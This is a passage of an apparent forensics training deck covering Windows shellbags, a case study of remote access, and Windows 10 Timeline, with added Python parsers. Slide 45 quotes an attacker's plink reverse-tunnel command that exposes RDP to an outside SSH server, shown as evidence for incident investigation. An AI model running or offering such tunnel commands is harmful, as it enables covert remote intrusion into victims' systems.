Windows Vista/2008 and later (\Users\<username>\AppData\Local\Microsoft\Windows\UsrClass.dat, with a smaller set still in NTUSER.DAT under Software\Microsoft\Windows\Shell):
HKEY_USERS\{SID}_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU and \Bags
§ Caveat: a shellbag entry shows that the folder was browsed in Explorer (or an open/save dialog); it does not show which files inside it were opened
43. 43
Registry Shellbags
Decoded shellbag keys can provide
- Paths to directories accessed via Explorer
- Date and time at which last access occurred (the last-write time of the BagMRU key holding the entry)
- MAC times of each path tracked in shellbags (embedded in the shell item as DOS timestamps, so 2-second resolution and local time)
Decoding tools
- RegRipper
- shellbags.py (github.com/williballenthin/shellbags)
- ShellBagsExplorer (https://ericzimmerman.github.io/#!index.md)
44. 44
ShellBags
MRU Time              Modified              Accessed              Created               Resource
2019-01-11 03:51:36   2018-12-30 02:59:32   2016-12-30 02:59:32   2017-11-05 14:40:54   My Computer\C:\Users\ITAdmin [Desktop0043]
2019-01-11 03:51:54   2018-05-07 15:54:36   2016-11-05 14:40:54   2017-11-05 14:40:54   My Computer\C:\Users\ITAdmin\AppData [Desktop00430]
                                                                                        My Network Places\hqdc1.com\hqdc1.com\general [Desktop240]
2018-12-25 02:40:59   2012-11-11 17:00:06   2012-11-11 17:00:06   2012-11-11 17:00:06   My Network Places\hqdc1.com\hqdc1.com\general\DC01 [Desktop2400]
2018-12-25 02:40:59   2014-05-23 21:53:24   2018-05-23 21:53:24   2011-04-07 12:28:28   My Network Places\hqdc1.com\hqdc1.com\general\DC01\ITIO Server Infrastructure [
2019-01-12 03:41:41   2017-01-10 14:07:12   2017-01-10 14:07:12   2017-05-02 13:45:42   My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop [Desktop290000]
2019-01-12 03:42:22   2017-01-11 18:42:04   2017-01-11 18:42:04   2017-01-10 14:06:56   My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\VDI [Desktop2900000]
2019-01-12 03:47:49   2017-01-05 21:37:52   2017-01-05 21:37:52   2017-01-05 20:05:26   My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\AD Resumes [Desktop2900001]
2019-01-12 03:41:42   2016-12-18 14:49:14   2016-12-18 14:49:14   2015-01-26 19:43:56   My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\My Impo'tant stuff [Desktop2900002]
2019-01-12 03:53:14   2016-12-15 20:57:58   2016-12-15 20:57:58   2016-11-24 22:18:00   My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\O365 [Desktop2900003]
2019-01-12 03:53:47   2015-09-23 13:52:10   2015-09-23 13:52:10   2016-05-02 13:45:42   My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\AppData [Desktop290001]
2019-01-11 03:46:21   2016-09-27 13:38:42   2016-09-27 13:38:42   2016-05-02 13:45:42   My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\AppData\Roaming [Desktop2900010]
The MRU Time column (last write of the BagMRU key) places the ITAdmin profile browsing frank's Desktop and AppData through the c$ administrative share of 192.168.1.54 on 2019-01-11 and 2019-01-12; the Modified/Accessed/Created columns are the target folders' own timestamps as they were at that moment.
45. 45
How did the attacker access the host?
§ Remotely installed ScreenConnect
§ Switched tactics and removed ScreenConnect / installed malware
§ Non-interactive malware used to download and execute PLink.exe to create a tunnel:
- plink.exe tunnel@<IP Address> -pw <Password> -P 443 -2 -4 -T -N -C -R 44489:127.0.0.1:3389
- -R 44489:127.0.0.1:3389 is a reverse forward: the attacker's SSH server (reached on TCP 443) listens on port 44489 and relays to RDP (3389) on the victim; -N and -T mean no remote command or terminal is requested, so the process just holds the tunnel open
§ Attacker then connected to the host over Remote Desktop through the tunnel, so the resulting RDP logon events (4624 Type 10) show a Source Network Address of 127.0.0.1 instead of the attacker's system
§ PuTTY/plink caches the SSH server's host key in the registry, which survives as evidence of where the tunnel went:
Key                                             Value                Data
HKCU\Software\SimonTatham\PuTTY\SshHostKeys     rsa2@<IP Address>    0x10001,0x… (SSH public key: RSA exponent, modulus)
- Value names take the form <keytype>@<port>:<host>, so with the command line above expect rsa2@443:<IP Address>
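The reading of that command line, as an added example (not code from the presentation): the parser turns a plink/ssh invocation into a description of the tunnel it builds and lists the host-side artifacts that tunnel predicts (the SshHostKeys value name, loopback-sourced RDP logons, the password in process-creation logs). It handles only the flags on the slide plus -L/-D; the command line is the slide's, with its placeholders quoted so they survive tokenisation, and the SSH server and password remain placeholders.

```python
"""Decode a plink/ssh command line into the tunnel it builds and the host-side
artifacts that tunnel predicts.

Added example, not from the presentation. Only the flags on the slide (-pw,
-P, -2, -4, -T, -N, -C, -R) plus -L/-D are handled; the command line below
is the slide's with its placeholders kept.
"""
import shlex

FLAGS_WITH_ARG = {"-pw", "-P", "-R", "-L", "-D", "-l", "-i"}
FLAGS_BOOL = {"-2", "-4", "-6", "-T", "-N", "-C", "-ssh"}


def parse_forward(spec):
    """'[bind:]port:host:hostport' -> dict; bind defaults to loopback on the listening side."""
    parts = spec.split(":")
    if len(parts) == 4:
        bind, port, host, hostport = parts
    elif len(parts) == 3:
        bind, (port, host, hostport) = "127.0.0.1", parts
    else:
        raise ValueError(f"unrecognised forward spec {spec!r}")
    return {"bind": bind, "listen_port": int(port), "target_host": host, "target_port": int(hostport)}


def parse_plink(cmdline):
    argv = shlex.split(cmdline, posix=True)
    result = {"exe": argv[0], "remote": None, "ssh_port": 22, "password_on_cmdline": False,
              "no_shell": False, "forwards": []}
    i = 1
    while i < len(argv):
        a = argv[i]
        if a in FLAGS_WITH_ARG:
            val = argv[i + 1]
            i += 2
            if a == "-pw":
                result["password_on_cmdline"] = True
            elif a == "-P":
                result["ssh_port"] = int(val)
            elif a in ("-R", "-L"):
                fwd = parse_forward(val)
                fwd["direction"] = "remote" if a == "-R" else "local"
                result["forwards"].append(fwd)
            elif a == "-D":
                result["forwards"].append({"direction": "dynamic", "listen_port": int(val)})
        elif a in FLAGS_BOOL:
            if a == "-N":
                result["no_shell"] = True
            i += 1
        else:
            result["remote"] = a            # user@host
            i += 1
    return result


def predicted_artifacts(parsed):
    """What the tunnel leaves behind on the victim host, derived from the parsed command line."""
    notes = []
    host = (parsed["remote"] or "?").split("@")[-1]
    notes.append(f"PuTTY host key cached: HKCU\\Software\\SimonTatham\\PuTTY\\SshHostKeys "
                 f"value rsa2@{parsed['ssh_port']}:{host}")
    for f in parsed["forwards"]:
        if f["direction"] == "remote" and f["target_host"] in ("127.0.0.1", "localhost", "::1"):
            svc = "RDP" if f["target_port"] == 3389 else f"port {f['target_port']}"
            notes.append(f"{svc} exposed to the SSH server on port {f['listen_port']}: expect "
                         f"inbound logons whose Source Network Address is 127.0.0.1 / ::1")
    if parsed["password_on_cmdline"]:
        notes.append("password present on the command line: recoverable from 4688/Sysmon "
                     "process-creation logs if command-line auditing was on")
    return notes


SAMPLE_CMD = ('plink.exe "tunnel@<IP Address>" -pw "<Password>" -P 443 -2 -4 -T -N -C '
              '-R 44489:127.0.0.1:3389')

if __name__ == "__main__":
    p = parse_plink(SAMPLE_CMD)
    print(p)
    for n in predicted_artifacts(p):
        print("-", n)
```

The same parse applied to a -L or -D forward predicts different artifacts (outbound connections from the host rather than loopback logons), which is why the direction is kept on each forward record.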
46. 46
Windows 10 Timeline
§ Timeline exists in Task View
- Accessed by hitting Win+Tab
§ Records a timeline of user activity for applications that report it and for desktop programs launched through the shell (Windows 10 1803 and later)
§ User engaged (in-focus periods with a start and end time)
§ Generic events (e.g. an application or document was opened)
§ Database location (SQLite):
- C:\Users\<User>\AppData\Local\ConnectedDevicesPlatform\L.<User>\ActivitiesCache.db
- the "L.<User>" folder belongs to a local account; the folder is named differently for Microsoft or Azure AD accounts
§ Caveat: entries expire (ExpirationTime column) and the feature can be disabled by policy, so absence of an entry proves little
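Querying that database, as an added example that is not part of the presentation: an in-memory SQLite copy of the Activity table is built with a subset of its real columns (Id, AppId, ActivityType, StartTime, EndTime, LastModifiedTime, Payload) and constructed rows, then read back as a per-application timeline with UTC times. Times are Unix epoch seconds, as the real database stores them; the ActivityType labels (5 = ExecuteOpen, 6 = InFocus) are the ones Timeline parsers commonly report and are an assumption here, not something the slide states.

```python
"""Query a Windows 10 Timeline database (ActivitiesCache.db) for per-application
activity with UTC start/end times.

Added example, not from the presentation. An in-memory SQLite copy of the
Activity table is built with a subset of its real columns and constructed
rows; times are Unix epoch seconds as in the real database. The ActivityType
labels are the ones commonly reported by Timeline parsers (an assumption).
"""
import json
import sqlite3
from datetime import datetime, timezone

ACTIVITY_TYPES = {5: "ExecuteOpen", 6: "InFocus (user engaged)"}   # assumed labels


def open_sample_db():
    """Constructed stand-in for ActivitiesCache.db with three rows from the case-study session."""
    con = sqlite3.connect(":memory:")
    con.execute("""CREATE TABLE Activity (
        Id BLOB PRIMARY KEY, AppId TEXT, ActivityType INTEGER, StartTime INTEGER,
        EndTime INTEGER, LastModifiedTime INTEGER, Payload BLOB)""")
    app = lambda exe: json.dumps([{"application": exe, "platform": "x_exe_path"}])
    rows = [
        (b"\x01" * 16, app(r"{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe"), 5,
         1548124081, 0, 1548124081, b'{"displayText":"Remote Desktop Connection"}'),
        (b"\x02" * 16, app(r"{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe"), 6,
         1548124081, 1548124210, 1548124210, None),
        (b"\x03" * 16, app(r"C:\Users\dave\Desktop\omg.exe"), 5,
         1548121163, 0, 1548121163, b'{"displayText":"omg"}'),
    ]
    con.executemany("INSERT INTO Activity VALUES (?,?,?,?,?,?,?)", rows)
    return con


def _utc(epoch):
    return None if not epoch else datetime.fromtimestamp(epoch, tz=timezone.utc)


def timeline(con, app_filter=None):
    """Rows ordered by StartTime; app_filter is a case-insensitive substring of the exe path."""
    out = []
    for app_id, a_type, start, end, payload in con.execute(
            "SELECT AppId, ActivityType, StartTime, EndTime, Payload FROM Activity "
            "ORDER BY StartTime, ActivityType"):
        # AppId is a JSON list of {application, platform}; the x_exe_path entry holds the path
        exe = next((e["application"] for e in json.loads(app_id) if e.get("platform") == "x_exe_path"),
                   app_id)
        if app_filter and app_filter.lower() not in exe.lower():
            continue
        text = json.loads(payload).get("displayText") if payload else None
        out.append({"exe": exe, "type": ACTIVITY_TYPES.get(a_type, f"type {a_type}"),
                    "start": _utc(start), "end": _utc(end), "display": text})
    return out


if __name__ == "__main__":
    for r in timeline(open_sample_db()):
        print(f'{r["start"]:%Y-%m-%d %H:%M:%S}  {r["type"]:<22} {r["exe"]}  {r["display"] or ""}')
```

Against a real copy, open the file read-only (copy it out first, together with the -wal and -shm files next to it, or the most recent writes are lost) and join to the same session window the event log gave you; the InFocus rows are the only artifact in this deck that carries an explicit end time for user activity.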